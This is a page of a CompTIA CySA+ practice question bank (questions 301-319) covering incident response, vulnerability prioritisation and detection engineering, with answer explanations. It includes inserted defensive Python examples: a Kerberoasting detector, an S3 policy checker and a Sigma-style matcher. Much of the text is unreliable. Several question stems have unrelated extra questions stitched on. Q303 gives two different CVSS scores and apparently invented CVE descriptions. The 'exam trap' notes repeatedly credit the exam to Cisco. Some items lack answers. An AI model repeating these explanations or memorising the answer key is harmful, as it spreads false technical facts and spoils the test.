CompTIA CySA+ CS0-003 (CS0-003) — Questions 301-375

503 questions total · 7 pages · All types, answers revealed

Page 5 of 7

301
MCQ · medium

An analyst has several malware samples from the same campaign and wants to detect related files based on unique strings and byte patterns. Which method is MOST appropriate? In the containment trade-off phase, which response balances containment with evidence preservation?

A. Tune DHCP lease duration
B. Use only a firewall deny rule for port 443
C. Create a CVE entry
D. Create and test a YARA rule against known-good and known-bad samples
Answer: D

YARA rules are suitable for identifying malware families using file strings, byte sequences, and conditions.

Why this answer

YARA rules are specifically designed to identify and classify malware samples based on textual or binary patterns, including unique strings and byte sequences. By testing the rule against known-good and known-bad samples, the analyst can validate its accuracy and reduce false positives, making it the most appropriate method for detecting related files from the same campaign.

Exam trap

CompTIA often tests the distinction between detection methods (YARA) and containment or remediation actions (firewall rules, DHCP changes), leading candidates to confuse operational security controls with forensic analysis techniques.

How to eliminate wrong answers

Option A is wrong because tuning DHCP lease duration affects network address allocation and does not help in detecting malware based on strings or byte patterns. Option B is wrong because using only a firewall deny rule for port 443 blocks HTTPS traffic indiscriminately, which would not identify related malware files and could disrupt legitimate business operations. Option C is wrong because creating a CVE entry is a process for documenting a vulnerability, not a method for detecting or classifying malware samples based on unique patterns.

302
MCQ · easy

In a regulated payment environment, a laptop may contain evidence for a legal investigation. What should the responder document during acquisition? During post-incident improvement, which decision is most defensible? Which action best reduces risk without losing evidence?

A. Only the laptop colour
B. Only the ticket priority
C. Only the user's job title
D. Who collected it, when, where, hash values, transfer details, and storage location
Answer: D

Chain of custody records evidence handling and integrity from collection onward. In post-incident improvement, responders need action that reduces risk while preserving the investigation record.

Why this answer

Option D is correct because legal and regulatory requirements demand a complete chain of custody for digital evidence. Documenting who collected the laptop, when, where, hash values (e.g., SHA-256), transfer details, and storage location ensures the evidence is admissible and tamper-proof. This aligns with NIST SP 800-86 and ISO 27037 forensic best practices.

Exam trap

The trap here is that candidates may think minimal documentation (like color or job title) is sufficient, but Cisco tests that only a complete chain-of-custody record satisfies legal admissibility and regulatory compliance.

How to eliminate wrong answers

Option A is wrong because documenting only the laptop color provides no forensic value and fails to establish chain of custody or evidence integrity. Option B is wrong because recording only the ticket priority is irrelevant to evidence handling and does not capture any forensic metadata. Option C is wrong because noting only the user's job title omits critical details like collection time, location, and hash verification, making the evidence legally indefensible.

303
MCQ · hard

Based on the scan output, which vulnerability should be prioritized first for remediation?

A. CVE-2019-16905
B. CVE-2020-15778
C. CVE-2020-12060
D. Both A and B equally.
Answer: B

Highest CVSS score (9.8).

Why this answer

CVE-2020-15778 is a critical command injection vulnerability in OpenSSH's scp utility that allows an unauthenticated remote attacker to execute arbitrary commands on the target system by crafting a malicious scp source path. This vulnerability has a CVSS score of 8.8 (High) and is remotely exploitable without authentication, making it the highest priority for remediation over the other listed CVEs.

Exam trap

CompTIA often tests the principle that remote code execution (RCE) vulnerabilities with no authentication requirement should always be prioritized over local privilege escalation or denial-of-service vulnerabilities, even if the latter have higher CVSS scores in some categories.

How to eliminate wrong answers

Option A is wrong because CVE-2019-16905 is a privilege escalation vulnerability in the Linux kernel's eBPF subsystem (bpf_skb_change_head) that requires local access to exploit, making it less critical than a remotely exploitable command injection. Option C is wrong because CVE-2020-12060 is a denial-of-service (DoS) vulnerability in the Linux kernel's NFSv4.2 implementation that requires specific conditions and only causes a system crash, not remote code execution. Option D is wrong because A and B are not equally critical; CVE-2020-15778 is the only one that allows unauthenticated remote command execution, which is a higher severity and should be prioritized first.

304
MCQ · hard

A threat hunter wants a portable detection for suspicious rundll32 execution that can be converted for multiple SIEM platforms. Which artefact format best fits this goal? In the detection engineering phase, which detection or tuning approach would reduce noise without losing the signal?

A. CVSS vector string
B. Sigma rule
C. OpenIOC package only
D. YARA rule
Answer: B

Sigma is designed as a generic detection-rule format that can be translated into SIEM-specific queries.

Why this answer

Sigma rules are the correct choice because they are a vendor-agnostic, YAML-based format designed specifically for writing detection logic that can be converted into multiple SIEM query languages (e.g., Splunk SPL, Elastic EQL, QRadar AQL). This portability directly meets the threat hunter's goal of creating a single detection for suspicious rundll32 execution that works across different SIEM platforms.

Exam trap

Cisco often tests the distinction between artifact formats (like OpenIOC) and detection rule formats (like Sigma), trapping candidates who confuse forensic artifact sharing with portable detection engineering.

How to eliminate wrong answers

Option A is wrong because CVSS vector strings describe vulnerability severity (e.g., CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) and are not used for detection logic or SIEM queries. Option C is wrong because OpenIOC packages are XML-based and primarily used for forensic artifact sharing in tools like Mandiant IOC Editor, but they are not as easily convertible across multiple SIEM platforms as Sigma rules, and they lack the standardized mapping to SIEM query languages that Sigma provides.

305
MCQ · medium

During a post-compromise review, a developer accidentally committed a cloud access key to a public repository. Logs show the key was used from an unfamiliar IP. What should be done first? During eradication, which decision is most defensible? Which action should be prioritized before closure?

A. Wait to see whether charges increase
B. Disable or rotate the key and review actions performed with it
C. Block the developer's laptop from Wi-Fi
D. Ask the developer to delete the commit only
Answer: B

The exposed credential must be invalidated and its use scoped through audit logs. In eradication, responders need action that reduces risk while preserving the investigation record.

Why this answer

Option B is correct because the immediate priority is to invalidate the compromised credential (rotate or disable the key) to prevent further unauthorized access, and then review the actions performed with it to assess the scope of the breach. This aligns with the NIST SP 800-61 incident response lifecycle, specifically the containment phase, where stopping the attacker's access is paramount before eradication or closure.

Exam trap

Cisco often tests the distinction between containment and eradication, where candidates mistakenly choose an eradication step (like blocking a laptop) before completing the critical containment action of revoking the compromised credential.

How to eliminate wrong answers

Option A is wrong because waiting to see whether charges increase is a passive, reactive approach that allows the attacker continued access, potentially leading to more damage and higher costs; it violates the principle of immediate containment. Option C is wrong because blocking the developer's laptop from Wi-Fi addresses a non-issue (the developer's local network access) and does nothing to revoke the cloud access key that is already exposed and being used from an unfamiliar IP; it confuses endpoint security with credential compromise.

306
Multi-Select · hard

Which THREE activities are typically performed during the post-incident activity phase of the incident response lifecycle?

Select 3 answers
A. System restoration from backups.
B. Root cause analysis.
C. Implementation of new security awareness training.
D. Evidence retention for potential legal action.
E. Lessons learned meeting.
Answers: B, D, E

Identifying the root cause is a key post-incident activity.

Why this answer

Root cause analysis (B) is performed during the post-incident activity phase to identify the underlying vulnerability or misconfiguration that allowed the incident to occur. This analysis informs remediation steps and helps prevent recurrence, making it a core activity of this phase.

Exam trap

CompTIA often tests the distinction between recovery-phase actions (e.g., system restoration) and post-incident analysis activities, leading candidates to mistakenly include restoration as a post-incident task.

307
Multi-Select · medium

A security analyst needs to communicate the findings of a penetration test to the IT operations team and the CISO. Which three of the following actions best support effective reporting and communication? (Choose three.)

Select 3 answers
A. Customize the level of detail in the report for each audience
B. Include raw command outputs and exploit code in the executive summary
C. Prioritize findings based on risk to the organization's mission
D. Provide actionable remediation steps with ownership assignments
E. Delay the report until all findings are fully verified with no uncertainty
F. Submit the report as a confidential document without any verbal briefing

Why this answer

Customizing the level of detail for each audience ensures that technical teams receive the operational depth they need (e.g., raw findings, exploit paths) while executives get a high-level summary focused on business risk and strategic impact. This aligns with the principle of audience-aware reporting in penetration testing, where the CISO requires risk context and the IT operations team needs actionable technical details.

Exam trap

CompTIA often tests the misconception that including all raw technical data in the executive summary is thorough, when in fact it violates audience-specific communication best practices and can overwhelm non-technical readers.

308
MCQ · hard

A SIEM alert shows one workstation requesting a high number of Kerberos service tickets for many SPNs, followed by no corresponding service access. Which attack should be suspected?

A. Kerberoasting reconnaissance or ticket harvesting
B. DNS cache poisoning
C. Pass-the-hash using NTLM only
D. ARP spoofing
Answer: A

Unusual TGS-REQ volume across service principals can indicate Kerberoasting activity.

Why this answer

A high volume of Kerberos service ticket requests for many SPNs, followed by no actual service access, is characteristic of Kerberoasting reconnaissance. In this attack, an adversary with valid domain credentials requests TGS tickets for service accounts to extract the NTLM hash embedded in the ticket, which can then be cracked offline. The lack of subsequent service access confirms the tickets were obtained solely for offline brute-force cracking, not legitimate use.

Exam trap

Cisco often tests the distinction between reconnaissance (ticket harvesting without access) and actual exploitation; the trap here is confusing Kerberoasting with pass-the-ticket or golden ticket attacks, which involve ticket reuse or forgery rather than offline hash cracking.

How to eliminate wrong answers

Option B is wrong because DNS cache poisoning involves corrupting DNS resolver caches to redirect traffic to malicious IPs, which does not generate Kerberos TGS requests or SPN enumeration. Option C is wrong because pass-the-hash using NTLM only exploits NTLM authentication by reusing captured NTLM hashes to authenticate, not by requesting Kerberos service tickets; the described behavior specifically involves Kerberos AS-REQ/TGS-REQ traffic, not NTLM.
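The SIEM logic this question describes, as an added example that is not part of the original question bank: one source host requesting service tickets for many distinct SPNs in a short window and then never logging on to any of those services. The events are constructed; field names follow Windows Security events 4769 (Kerberos service ticket requested) and 4624 (successful logon), but the flattened layout, the thresholds and the window are assumptions a SIEM engineer would tune.

```python
"""Kerberoasting-style detection over normalised 4769/4624 events (constructed sample data)."""
from collections import defaultdict
from datetime import datetime, timedelta

DISTINCT_SPN_THRESHOLD = 5        # assumed tuning value; raise it in noisy domains
WINDOW = timedelta(minutes=10)    # assumed sliding window
RC4_HMAC = "0x17"                 # TicketEncryptionType for RC4, the ticket type crackable offline


def _ts(value):
    return datetime.strptime(value, "%Y-%m-%d %H:%M:%S")


def _spn_host(spn):
    """'cifs/FS01.corp.local' or 'MSSQLSvc/DB01.corp.local:1433' -> host part, lower-cased."""
    return spn.split("/", 1)[-1].split(":", 1)[0].lower()


def detect_kerberoasting(events, threshold=DISTINCT_SPN_THRESHOLD, window=WINDOW):
    """Return one alert per (source IP, account) that requested tickets for at
    least `threshold` distinct SPNs within `window` and produced no network
    logon (4624) to any of those service hosts in the same window."""
    tgs_requests = defaultdict(list)   # (ip, user) -> [(time, spn, enc_type)]
    logons = defaultdict(list)         # (ip, user) -> [(time, host)]
    for ev in events:
        key = (ev["ip"], ev["user"])
        if ev["event_id"] == 4769:
            tgs_requests[key].append((_ts(ev["time"]), ev["spn"], ev["enc"]))
        elif ev["event_id"] == 4624:
            logons[key].append((_ts(ev["time"]), ev["host"].lower()))

    alerts = []
    for key, reqs in tgs_requests.items():
        reqs.sort()
        for i, (start, _, _) in enumerate(reqs):
            in_window = [r for r in reqs[i:] if r[0] - start <= window]
            spns = {spn for _, spn, _ in in_window}
            if len(spns) < threshold:
                continue
            hosts = {_spn_host(s) for s in spns}
            end = start + window
            accessed = [h for t, h in logons[key] if start <= t <= end and h in hosts]
            if accessed:
                continue            # tickets were actually used: ordinary client behaviour
            alerts.append({
                "ip": key[0],
                "user": key[1],
                "spn_count": len(spns),
                "rc4_tickets": sum(1 for _, _, enc in in_window if enc == RC4_HMAC),
                "window_start": start.isoformat(),
            })
            break                   # one alert per (ip, user) is enough for triage
    return alerts


# Constructed sample: a normal workstation that uses the tickets it requests,
# and a second host that harvests six RC4 tickets and touches none of the services.
SAMPLE_EVENTS = [
    {"time": "2024-05-01 02:00:00", "event_id": 4769, "ip": "10.0.0.5", "user": "jdoe",
     "spn": "cifs/FS01.corp.local", "enc": "0x12"},
    {"time": "2024-05-01 02:00:03", "event_id": 4624, "ip": "10.0.0.5", "user": "jdoe",
     "host": "FS01.corp.local"},
    {"time": "2024-05-01 02:01:10", "event_id": 4769, "ip": "10.0.0.5", "user": "jdoe",
     "spn": "HTTP/intranet.corp.local", "enc": "0x12"},
    {"time": "2024-05-01 02:01:12", "event_id": 4624, "ip": "10.0.0.5", "user": "jdoe",
     "host": "intranet.corp.local"},
] + [
    {"time": f"2024-05-01 03:10:{i:02d}", "event_id": 4769, "ip": "10.0.0.77",
     "user": "tmp.user", "spn": spn, "enc": "0x17"}
    for i, spn in enumerate([
        "MSSQLSvc/DB01.corp.local:1433", "MSSQLSvc/DB02.corp.local:1433",
        "HTTP/reports.corp.local", "cifs/FS02.corp.local",
        "ldap/APP01.corp.local", "exchangeMDB/MAIL01.corp.local",
    ])
]

if __name__ == "__main__":
    for alert in detect_kerberoasting(SAMPLE_EVENTS):
        print(alert)
```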

309
MCQ · hard

A security analyst reviews this S3 bucket policy. Which vulnerability is present?

A. Missing encryption
B. Cross-site scripting
C. Insecure direct object reference
D. Public read access to all objects
Answer: D

Principal '*' with Allow effect grants public access to all objects in the bucket.

Why this answer

The S3 bucket policy grants public read access to all objects via the `Principal: "*"` and `Action: "s3:GetObject"` statement. This means any unauthenticated user on the internet can list and download objects in the bucket, exposing sensitive data. The vulnerability is explicitly public read access, not missing encryption or application-layer flaws.

Exam trap

CompTIA often tests the distinction between a misconfigured access control policy (like public read) and other vulnerability types (like encryption or injection), so candidates mistakenly choose 'missing encryption' because they see a lack of security controls, but the policy itself does not address encryption at all.

How to eliminate wrong answers

Option A is wrong because missing encryption (e.g., server-side encryption not enforced) is a compliance or data-at-rest risk, but the policy shown does not disable encryption—it simply allows public reads. Option B is wrong because cross-site scripting (XSS) is a web application vulnerability involving injection of malicious scripts into web pages, not a misconfiguration in an S3 bucket policy. Option C is wrong because insecure direct object reference (IDOR) is an access control flaw where a user can access unauthorized resources by manipulating identifiers (e.g., object keys), but the policy here grants blanket public access to all objects, not a per-object IDOR issue.
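A static check for the misconfiguration this question describes, added here as an example and not part of the original question bank or of any AWS tooling: it flags Allow statements whose Principal is anonymous (`"*"` or `{"AWS": "*"}`), and reports a conditioned grant for review rather than as outright public. The three policy documents are constructed; the account ID and role name in the corrected policy are placeholders.

```python
"""Find bucket-policy statements that grant access to anonymous principals."""
import json


def _as_list(value):
    return value if isinstance(value, list) else [value]


def _is_anonymous(principal):
    """The two principal spellings that mean 'anyone, including unauthenticated'."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS", []))
    return False


def find_public_access(policy_doc):
    """Return findings for Allow statements granted to anonymous principals.

    A statement with a Condition block (for example aws:SourceIp) is reported
    as 'review' rather than 'public': the condition may narrow the grant, but
    whether it does so adequately is a human judgement. NotPrincipal and
    NotAction forms are deliberately not handled here."""
    policy = json.loads(policy_doc) if isinstance(policy_doc, str) else policy_doc
    findings = []
    for stmt in _as_list(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow" or not _is_anonymous(stmt.get("Principal")):
            continue
        findings.append({
            "sid": stmt.get("Sid", "<no Sid>"),
            "actions": _as_list(stmt.get("Action", [])),
            "resources": _as_list(stmt.get("Resource", [])),
            "severity": "review" if stmt.get("Condition") else "public",
        })
    return findings


# Constructed: the pattern the question describes (public read of every object).
PUBLIC_READ_POLICY = """{
  "Version": "2012-10-17",
  "Statement": [{
    "Sid": "PublicRead",
    "Effect": "Allow",
    "Principal": "*",
    "Action": "s3:GetObject",
    "Resource": "arn:aws:s3:::example-bucket/*"
  }]
}"""

# Constructed: the same grant limited to one IAM role (placeholder account and role).
ROLE_SCOPED_POLICY = """{
  "Version": "2012-10-17",
  "Statement": [{
    "Sid": "AppRoleRead",
    "Effect": "Allow",
    "Principal": {"AWS": "arn:aws:iam::111122223333:role/app-reader"},
    "Action": "s3:GetObject",
    "Resource": "arn:aws:s3:::example-bucket/*"
  }]
}"""

# Constructed: anonymous principal narrowed by a source-IP condition; flagged for review.
IP_CONDITIONED_POLICY = """{
  "Version": "2012-10-17",
  "Statement": [{
    "Sid": "InternalRangeRead",
    "Effect": "Allow",
    "Principal": {"AWS": "*"},
    "Action": ["s3:GetObject", "s3:ListBucket"],
    "Resource": ["arn:aws:s3:::example-bucket", "arn:aws:s3:::example-bucket/*"],
    "Condition": {"IpAddress": {"aws:SourceIp": "10.0.0.0/8"}}
  }]
}"""

if __name__ == "__main__":
    for name, doc in [("public-read", PUBLIC_READ_POLICY), ("role-scoped", ROLE_SCOPED_POLICY),
                      ("ip-conditioned", IP_CONDITIONED_POLICY)]:
        print(name, find_public_access(doc))
```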

310
MCQ · medium

During a post-compromise review, a server suspected of running fileless malware is still powered on. Which evidence should be captured first if it is safe to do so? During detection and analysis, which decision is most defensible? Which action should be prioritized before closure?

A. Volatile memory and active network/process state
B. Marketing screenshots
C. Archived monthly reports
D. The office seating plan
Answer: A

Fileless malware may reside in memory; volatile evidence disappears when the system is powered off. In detection and analysis, responders need action that reduces risk while preserving the investigation record.

Why this answer

In a post-compromise review of a server suspected of running fileless malware, volatile memory (RAM) and active network/process state must be captured first because fileless malware resides only in memory and leaves no persistent artifacts on disk. Capturing this evidence preserves the malware's code, running processes, network connections, and other transient data that would be lost on reboot or shutdown, enabling forensic analysis of the attack.

Exam trap

Cisco often tests the principle of order of volatility (OOV), where candidates mistakenly prioritize disk-based evidence over volatile memory, forgetting that fileless malware exists only in RAM and is destroyed on power loss.

How to eliminate wrong answers

Option B is wrong because marketing screenshots are irrelevant to forensic evidence collection and provide no technical data about fileless malware or system compromise. Option C is wrong because archived monthly reports are historical and non-volatile, containing no real-time process, memory, or network state needed to detect and analyze fileless malware that exists only in memory.

311
MCQ · hard

A cloud tenant shows an unusual spike in IAM policy changes, access key creation, and failed console logons from a new country. Which telemetry set gives the strongest evidence for control-plane compromise? In the alert triage phase, which action gives the analyst the clearest next triage step?

A. Endpoint antivirus quarantine reports only
B. Packet captures from user laptops only
C. Cloud audit logs for identity, policy, and key-management API calls
D. Web server access logs from the public website
Answer: C

Control-plane attacks are best investigated through authoritative audit events that record who changed identity and access configuration.

Why this answer

Option C is correct because cloud audit logs (e.g., AWS CloudTrail, Azure Activity Log) capture control-plane API calls such as IAM policy changes, key creation, and authentication failures. These logs directly record the identity and resource management actions that indicate a compromise of the cloud management plane, whereas endpoint or network telemetry only reflects data-plane activity and cannot see API-level administrative actions.

Exam trap

The trap here is that candidates often confuse data-plane telemetry (endpoint AV, packet captures) with control-plane telemetry, failing to recognize that only cloud audit logs can capture administrative API calls like IAM policy changes and key creation.

How to eliminate wrong answers

Option A is wrong because endpoint antivirus quarantine reports only detect malware or file-based threats on individual devices; they cannot capture cloud control-plane API calls like IAM policy changes or access key creation. Option B is wrong because packet captures from user laptops only show network traffic at the data plane (e.g., HTTP, SSH sessions) and cannot log cloud management API requests that occur between the client and the cloud provider's control-plane endpoints.

312
MCQ · easy

A vulnerability scan identifies a critical unauthenticated remote-code-execution flaw on an internet-facing VPN appliance that is actively exploited in the wild. Several internal-only medium vulnerabilities are also present. What should be remediated first? For control selection, which control best addresses the stated weakness without hiding risk?

A. Patch or mitigate the VPN appliance immediately and verify exposure is removed
B. Remediate only low-risk internal findings to improve closure rate
C. Start with the oldest medium vulnerability
D. Defer all remediation until the monthly patch window
Answer: A

Internet exposure plus active exploitation makes this the highest-risk item despite other findings.

Why this answer

The VPN appliance's critical unauthenticated remote-code-execution flaw is actively exploited in the wild, posing an immediate and severe risk to the entire network perimeter. Remediating this first aligns with the vulnerability management principle of prioritizing by risk severity and exploitability, as an internet-facing device with a known active exploit bypasses all authentication controls and can lead to full compromise. Patching or mitigating it directly removes the exposure without obscuring the risk, unlike compensating controls that might hide the underlying weakness.

Exam trap

Cisco often tests the misconception that all vulnerabilities should be remediated in order of CVSS score alone, but here the trap is that candidates might choose a lower-severity internal finding because it is 'older' or 'easier to fix,' ignoring the criticality of an actively exploited, internet-facing RCE that demands immediate action regardless of other metrics.

How to eliminate wrong answers

Option B is wrong because focusing on low-risk internal findings to improve closure rate ignores the critical external threat; closure rate metrics are secondary to actual risk reduction, and this approach would leave the most dangerous vulnerability unaddressed. Option C is wrong because prioritizing by age (oldest medium vulnerability) disregards severity and active exploitation; a medium internal flaw, regardless of age, poses far less risk than a critical unauthenticated RCE on an internet-facing device that is already being exploited in the wild.

313
MCQ · easy

A user opens an invoice document and shortly afterward the endpoint runs wscript.exe from the user's profile. Which detection logic is most relevant? In the detection engineering phase, which detection or tuning approach would reduce noise without losing the signal?

A. Office document spawning a script interpreter from a user context
B. Successful DHCP renewal
C. High CPU usage on the print server
D. A password expiry warning
Answer: A

Office-to-script process chains are common initial execution patterns for phishing payloads.

Why this answer

The correct detection logic is 'Office document spawning a script interpreter from a user context' because the scenario describes a classic malware execution chain: a user opens an invoice document (likely a malicious Office file with embedded macros or exploits), which then launches wscript.exe (a Windows Script Host interpreter) from the user's profile. This behavior is a strong indicator of a script-based attack, such as a macro virus or a downloader, and is directly relevant to detection engineering for endpoint security.

Exam trap

Cisco often tests the distinction between process-level behavioral detection (e.g., script interpreter spawned by Office) and unrelated system or network metrics, so candidates may mistakenly choose a generic performance or network event instead of recognizing the specific attack chain.

How to eliminate wrong answers

Option B is wrong because successful DHCP renewal is a routine network event that does not involve script execution or user-initiated document processing, and it would not generate noise relevant to the described attack chain. Option C is wrong because high CPU usage on the print server is a performance metric unrelated to endpoint script execution from an Office document, and it would not help detect or tune for the specific threat of wscript.exe being spawned from a user context.
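The two detections discussed in questions 304 and 313 (portable rundll32 logic with a noise filter, and an Office application spawning a script interpreter) expressed in a Sigma-style layout, as an added example that is not the Sigma project's code: real Sigma rules are YAML converted by pySigma backends, whereas here the rules are Python dicts that mirror Sigma's named selections, `field|modifier` keys and boolean condition, so one rule can both be matched against events and rendered into a Splunk-style search. Field names follow the Sysmon/Sigma process_creation convention; the filter parents and sample events are assumed tuning choices and constructed data.

```python
"""Minimal Sigma-style rule matcher and illustrative SPL renderer."""
import re

SUSPICIOUS_RUNDLL32 = {
    "title": "rundll32 launched by a non-system parent",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection": {"Image|endswith": "\\rundll32.exe"},
        # Tuning (assumed): rundll32 started by these service-host parents is
        # routine here, so it is filtered out without dropping user-context hits.
        "filter_system_parent": {
            "ParentImage|endswith": ["\\svchost.exe", "\\msiexec.exe"]},
        "condition": "selection and not filter_system_parent",
    },
}

OFFICE_SPAWNS_SCRIPT = {
    "title": "Office application spawning a script interpreter",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection": {
            "ParentImage|endswith": ["\\winword.exe", "\\excel.exe", "\\outlook.exe"],
            "Image|endswith": ["\\wscript.exe", "\\cscript.exe", "\\mshta.exe"],
        },
        "condition": "selection",
    },
}

_CONNECTIVES = {"and", "or", "not", "(", ")"}


def _field_matches(key, expected, event):
    """One Sigma field test; a list of expected values is an OR; case-insensitive as on Windows."""
    field, _, modifier = key.partition("|")
    actual = str(event.get(field, "")).lower()
    for exp in (expected if isinstance(expected, list) else [expected]):
        exp = str(exp).lower()
        hit = {"endswith": actual.endswith(exp), "startswith": actual.startswith(exp),
               "contains": exp in actual, "": actual == exp}.get(modifier, False)
        if hit:
            return True
    return False


def _condition_tokens(rule):
    """Tokenise the condition and refuse anything that is not a selection name
    or a boolean connective, so the eval in matches() only ever sees True/False/and/or/not."""
    det = rule["detection"]
    selections = {k: v for k, v in det.items() if k != "condition"}
    tokens = re.findall(r"[A-Za-z0-9_]+|[()]", det["condition"])
    bad = [t for t in tokens if t not in _CONNECTIVES and t not in selections]
    if bad:
        raise ValueError(f"unsupported condition token(s): {bad}")
    return selections, tokens


def matches(rule, event):
    """True if the event satisfies the rule's condition."""
    selections, tokens = _condition_tokens(rule)
    expr = " ".join(
        str(all(_field_matches(k, v, event) for k, v in selections[t].items()))
        if t in selections else t
        for t in tokens)
    return bool(eval(expr, {"__builtins__": {}}, {}))   # whitelisted tokens only


def _spl_escape(value):
    return str(value).replace("\\", "\\\\")


def to_splunk(rule):
    """Render the same rule as a Splunk-style search (illustrative syntax; a real
    converter would target SPL, KQL or AQL from the identical rule)."""
    selections, tokens = _condition_tokens(rule)
    wildcard = {"endswith": "*{}", "startswith": "{}*", "contains": "*{}*", "": "{}"}

    def render(selection):
        parts = []
        for key, expected in selection.items():
            field, _, modifier = key.partition("|")
            values = expected if isinstance(expected, list) else [expected]
            alts = " OR ".join(f'{field}="{wildcard[modifier].format(_spl_escape(v))}"'
                               for v in values)
            parts.append(f"({alts})" if len(values) > 1 else alts)
        return "(" + " AND ".join(parts) + ")"

    return " ".join(render(selections[t]) if t in selections
                    else t.upper() if t in ("and", "or", "not") else t
                    for t in tokens)


# Constructed process-creation events (Sysmon-style field names).
SAMPLE_EVENTS = [
    {"Image": "C:\\Windows\\System32\\rundll32.exe",
     "ParentImage": "C:\\Windows\\System32\\svchost.exe",
     "CommandLine": "rundll32.exe C:\\Windows\\System32\\shell32.dll,Control_RunDLL"},
    {"Image": "C:\\Windows\\System32\\rundll32.exe",
     "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "CommandLine": "rundll32.exe C:\\Users\\jdoe\\AppData\\Local\\Temp\\inv.dll,Start"},
    {"Image": "C:\\Windows\\System32\\wscript.exe",
     "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "CommandLine": "wscript.exe C:\\Users\\jdoe\\AppData\\Local\\Temp\\invoice.js"},
]


def run_rules(rules, events):
    """Return (rule title, event index) pairs for every hit."""
    return [(r["title"], i) for i, ev in enumerate(events) for r in rules if matches(r, ev)]


if __name__ == "__main__":
    print(run_rules([SUSPICIOUS_RUNDLL32, OFFICE_SPAWNS_SCRIPT], SAMPLE_EVENTS))
    print(to_splunk(SUSPICIOUS_RUNDLL32))
```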

314
Drag & Drop · medium

Order the steps for deploying a new security patch to a production environment.


Why this order

Patch deployment involves download/verification, testing, backup, rollout, and monitoring.

315
MCQ · easy

Two servers have the same critical vulnerability. One hosts a public payment API; the other is a lab server isolated from production. What changes the remediation priority? For validation, which action should be taken before closing or downgrading the finding?

A. Asset criticality, exposure, and business impact
B. The colour of the scanner dashboard
C. The number of installed fonts
D. Whether the hostname is shorter
Answer: A

The same CVE can represent different risk depending on where it exists and what the asset supports.

Why this answer

Remediation priority is determined by risk, which is a function of asset criticality, exposure, and business impact. The public payment API has high asset criticality (handles sensitive financial data), high exposure (accessible from the internet), and high business impact (breach could cause regulatory fines and revenue loss), whereas the isolated lab server has low exposure and minimal business impact. This aligns with the CVSS environmental score modifiers and NIST SP 800-30 risk assessment methodology.

Exam trap

Cisco often tests the misconception that all vulnerabilities with the same CVE should be patched with equal urgency, ignoring the criticality of the asset and its exposure to threats.

How to eliminate wrong answers

Option B is wrong because the colour of the scanner dashboard is a cosmetic UI element and has no bearing on risk-based prioritization; vulnerability management decisions must be data-driven, not based on visual indicators. Option C is wrong because the number of installed fonts is irrelevant to security posture or remediation priority; it does not affect exploitability, exposure, or business impact.

316
Multi-Select · medium

A security analyst is preparing a post-incident report for a recent data breach. The report must be tailored for multiple audiences, including executive leadership, legal counsel, and the technical remediation team. Which four of the following best practices should the analyst follow to ensure effective communication and reporting? (Choose four.)

Select 4 answers
A. Including a high-level executive summary with business impact and risk exposure for the C-suite.
B. Providing detailed technical indicators of compromise (IOCs) and remediation steps for the technical team.
C. Including legal hold notices and chain-of-custody documentation for legal counsel.
D. Using a single, standardized report format for all stakeholders to ensure consistency.
E. Omitting the root cause analysis to avoid liability concerns in the legal review.
F. Adding a timeline of events and actions taken for the incident response team.

Why this answer

Including a high-level executive summary with business impact and risk exposure is correct because executive leadership requires a non-technical overview that focuses on financial, legal, and reputational consequences. This aligns with the NIST SP 800-61 Rev. 2 recommendation to tailor incident reports to the audience, ensuring the C-suite can make informed strategic decisions without being bogged down by technical details.

Exam trap

CompTIA often tests the misconception that a single standardized report is efficient, but the trap is that it ignores the distinct information needs of different stakeholders, leading to ineffective communication and potential compliance failures.

317
MCQ · easy

A DAST scan cannot reach authenticated pages of a web application and reports only public content findings. What should be configured? For validation, which action should be taken before closing or downgrading the finding?

A. Disable all application authentication
B. Treat absence of findings as proof of security
C. Authenticated scanning with a test account and session handling
D. Reduce the scan to only the landing page
Answer: C

DAST needs valid authentication and session management to test protected functionality.

Why this answer

DAST scanners require authenticated sessions to crawl and test pages behind login forms. Configuring authenticated scanning with a test account and proper session handling (e.g., cookie-based or token-based authentication) allows the scanner to maintain state and reach protected endpoints. Without this, the scanner only sees public content, missing vulnerabilities in authenticated areas.

Exam trap

Cisco often tests the misconception that disabling authentication or ignoring missing findings is acceptable, when the correct approach is to configure authenticated scanning to ensure comprehensive coverage of the attack surface.

How to eliminate wrong answers

Option A is wrong because disabling all application authentication would remove the security controls protecting sensitive pages, potentially exposing the application to unauthorized access and violating security requirements. Option B is wrong because treating the absence of findings as proof of security is a false sense of confidence; the scanner simply did not test the authenticated pages, so no conclusions about their security can be drawn.

318
MCQ · easy

A vulnerability scan report shows a critical vulnerability on a web server with a CVSS score of 9.8. The IT manager wants to know the risk to the organization. Which of the following factors should the analyst consider FIRST?

A. The asset value and business criticality
B. The vendor's patch release schedule
C. The number of exploit attempts in the logs
D. The number of other vulnerabilities on the server
Answer: A

The impact of exploitation depends on how critical the server is.

Why this answer

The CVSS score of 9.8 indicates a critical severity vulnerability, but risk is a function of both severity and business context. The analyst must first assess the asset value and business criticality of the web server because a critical vulnerability on a non-essential server poses lower risk than the same vulnerability on a server handling sensitive data or core business processes. Without this context, the organization cannot prioritize remediation effectively.

Exam trap

CompTIA often tests the distinction between vulnerability severity (CVSS) and organizational risk, trapping candidates who confuse a high CVSS score with automatically high risk without considering asset context.

How to eliminate wrong answers

Option B is wrong because the vendor's patch release schedule is an operational consideration for remediation timing, not the primary factor for determining risk; risk assessment must first establish the impact on the organization. Option C is wrong because the number of exploit attempts in logs indicates current threat activity, but risk is evaluated based on potential impact and likelihood, not solely on observed attacks; a vulnerability with no current exploits can still pose high risk if the asset is critical. Option D is wrong because the number of other vulnerabilities on the server is irrelevant to the risk of this specific vulnerability; each vulnerability must be assessed independently based on asset criticality and exposure.

319
Multi-Select · medium

A vulnerability management analyst is reviewing the results of an authenticated scan. The analyst identifies several medium-severity vulnerabilities that have been present for over a year. Which of the following are the best actions to take? (Choose two.)

Select 2 answers
A. Verify the vulnerabilities are still relevant by re-scanning.
B. Escalate to the asset owner for remediation.
C. Accept the risk if the system is no longer in use.
D. Remove the system from the network.
E. Increase the severity rating to high to ensure remediation.
Answers: A, B

Re-scanning confirms current status.

Why this answer

